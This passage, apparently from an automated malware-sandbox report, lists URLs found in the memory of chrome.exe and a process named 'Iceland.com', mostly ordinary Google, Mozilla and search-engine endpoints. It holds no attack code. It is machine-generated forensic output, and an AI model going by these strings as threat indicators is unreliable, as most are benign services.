                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 0000000F.00000003.2149376359.0000027800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2213920187.000002780002C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 0000000F.00000002.2216016552.0000027800670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 0000000F.00000002.2217452713.0000027800A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216666258.00000278007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217337654.00000278009C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219030800.0000027800D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215981147.000002780065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215981147.000002780065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4yx
                Source: chrome.exe, 0000000F.00000002.2219030800.0000027800D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=eni
                Source: chrome.exe, 0000000F.00000003.2143015677.0000027800C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2144782975.0000027800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145407739.0000027800C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145263645.0000027800E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142766721.0000027800C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2144838048.0000027800C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149412280.0000027800C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142717097.0000027800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145073134.0000027800E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150227627.0000027800C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149376359.0000027800C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 0000000F.00000002.2216016552.0000027800670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorex
                Source: chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 0000000F.00000002.2213920187.000002780002C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g1
                Source: chrome.exe, 0000000F.00000003.2124470635.000024D4002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124453571.000024D4002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 0000000F.00000002.2216377815.000002780072D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215785880.00000278005A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216042708.0000027800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216326233.00000278006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2213920187.000002780002C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 0000000F.00000002.2215785880.00000278005A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 0000000F.00000002.2217545784.0000027800AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googlP6x
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 0000000F.00000002.2214915433.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145015465.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2143157721.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141719403.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.000002780033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icogles
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/H
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Y
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hjH
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2213890186.000002780000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 0000000F.00000002.2215981147.000002780065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: UAS0ZU.10.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
